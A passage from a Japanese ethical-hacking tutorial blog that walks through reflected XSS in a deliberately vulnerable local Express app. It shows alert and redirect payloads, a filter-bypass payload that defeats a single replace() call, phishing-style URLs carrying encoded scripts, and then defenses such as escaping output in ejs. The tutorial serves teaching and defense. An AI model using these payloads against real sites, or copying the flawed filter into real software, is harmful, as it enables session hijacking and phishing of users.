これで任意のJavaScriptを実行できることが分かりました。

ただアラートを表示させるだけでは、脆弱性とはならないと思われる方もいるでしょう。
しかしXSSが可能であれば下記の様なことが可能となります。

• セッションハイジャック（アカウントの乗っ取り）
• Webページの改ざん
• 悪質なWebサイトへの強制移動
• フォームへの入力内容の窃取

他にも様々な被害が考えられますが、今回は「悪質なWebサイトへの強制移動」を試してみましょう。
では下記のコードを入力してみてください。

<script>location="https://www.google.com"</script>

するとGoogleへ移動したと思います。（今回はGoogleを悪質なWebサイトであると想定しました。）

しかし疑問に思う方もいるでしょう。
今までは自分で入力したコードが自分のブラウザ上で実行されているだけで、どのように他ユーザーへの攻撃が成立するのでしょうか？

「2乗計算プログラム」に戻って、もう一度アラートのスクリプトを入力してください。

<script>alert(1)</script>

アドレスバーを見てみると、下記の様にGETリクエストのパラメータとして先ほどのスクリプトが見えると思います。（一部URLエンコードされているので分かりづらいかもしれません。）

http://10.0.2.23:3000/xss-get-1?number=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

URL上に攻撃のスクリプトが混入できるということは、このURLを他人にクリックさせることができるということで、それは先ほどのJavaScriptを他ユーザーのブラウザ上で実行できることに繋がります。

今回はローカル環境で行っているため、みなさんの仮想環境でしか成り立ちませんが、例えば皆さんが使用しているショッピングサイトに反射型XSSがあればどうでしょうか？
反射型XSSを悪用した攻撃者が、クーポンを獲得できるURLを紹介しますというメールを送れば、一定数押してしまう人もいるでしょう。
XSSが普通のフィッシングメールに書かれている怪しいURLと比較して厄介なのは、ドメインが怪しく見えないということです。

怪しいフィッシングメールのURL例（ドメインは適当です）
https[:]//jfalksureoiewujfdalka-elkajjfadk.com/shop?product=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

XSSを利用したURL例（ドメインは適当です）
https[:]//yourshopping-site.com/shop?product=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

これがXSSの概要です。
今回は反射型の一番基本的なXSSを攻撃してみました。
冒頭でお伝えしたように、XSSには蓄積型やDOM型など様々であり、興味のある方はぜひご自身で調べてみてください。

XSS(クロスサイトスクリプティング) - Level2

ではトップページに戻ってLevel2に挑戦しましょう。
こちらも先ほどと同じ反射型のXSSになります。プログラムも先ほどと全く同じ「2乗計算プログラム」です。

Level2は、XSSへの対策を講じたプログラムです。
しかし対策が不十分なことから、対策を回避することが可能です。
もし自分で挑戦したい方がいればここで記事を読むのを止めて、ぜひ挑戦してみてください。


では解説していきます。
前回同様のアラートを出すペイロードを入力してみましょう。

<script>alert(1)</script>

するとどうでしょうか、JavaScriptが実行されていないことが分かります。

入力したペイロードの一部が、入力した数字の欄に残っています。
これはどういうことでしょうか？
詳細をつかむために、ページのソースを見てみましょう。

すると開始スクリプトタグの<と>がなくなっていることに気が付きます。
サーバーサイドのソースコードがない状態であれば、ここから色々なペイロードを送信してみて挙動を把握していきますが、今回はサーバーサイドのソースコードを見てみましょう。

app.get('/xss-get-2', (req, res) => {
  var number = req.query.number;
  number = number.replace("<", "").replace(">", "");
  var square = number * number;
  res.render("xss-level2.ejs", { number: number , square: square });
});

プログラムを書いたことのない人にとっては見慣れないコードだと思いますが、注目してほしい所は3行目です。

number = number.replace("<", "").replace(">", "");

何をしているかというと、GETリクエストで送られたnumberパラメータの値の中に<と>があれば消してしまおうというものです。replaceメソッドを用いてそれを実現しています。

しかし思い出してみてください。
先ほどのアラートを発生させるスクリプトでは、終了タグ（</script>）はそのまま残っていました。
JavaScriptのreplaceメソッドを調べてみましょう。
www.javadrive.jp
記事を読んでみると、上記ソースコードのreplaceメソッドの使い方では、一度目のマッチでのみ置換が適応されるとのことです。
ということは下記の様なペイロードが対策を回避するために考えられるでしょう。

<><script>alert(1)</script>

上記ペイロードでは先頭に中身のない空のタグを設置することで、空のタグ部分をreplaceメソッドで置換させ、残りのスクリプトを通常通り発火させることができます。
入力してみるとアラートを確認できます。

このように脆弱性に対して対策が取られていたとしても、対策が不十分であれば回避することが可能であるということです。

対策

XSSへの対策は大きく分けて2つの方向性があります。
1つ目はインプットに対するバリデーションです。
Level2では、インプットに対してバリデーションがされているがその対策が不完全である例を示しました。
Level2ではタグを一度だけ置換していたことが問題なので、全てのタグを置換するようにすればリスクを低減することが可能です。
また、長く危険なスクリプトを挿入されることを防ぐために、サーバーにて文字数制限を設定することも効果的です。

2つ目がアウトプットに対するサニタイジングです。（こちらの方が導入が簡単で効果が大きいです。）
今回のアプリケーションは「Express」というフレームワークを用いて開発しています。
Expressのテンプレートエンジンである「ejs」では、簡単にXSSの対策をすることが可能です。

脆弱性のあるコード
<%- number %>
XSSの対策がされたコード
<%= number %>

numberは入力した数字を表しています。
このように「-」を「=」に変換するだけで簡単にXSSの対策をすることが可能です。
「=」ではエスケープ処理を行います。エスケープ処理とは、特殊記号をHTMLエンティティに変換することです。
昨今のWebアプリ開発では何かしらのフレームワークを使用することがほどんどです。
各フレームワークでは、XSSへの対策が簡単に（もしくはデフォルトで）できるようになっていますので、開発する際は頭に入れておいてください。
基本的にインプットをバリデーションするよりも、アウトプットをサニタイジングするほうが難易度が低く、効果も絶大です。

お疲れ様でした。
次はSQLインジェクションです。

learn-ethicalhacking.hatenablog.com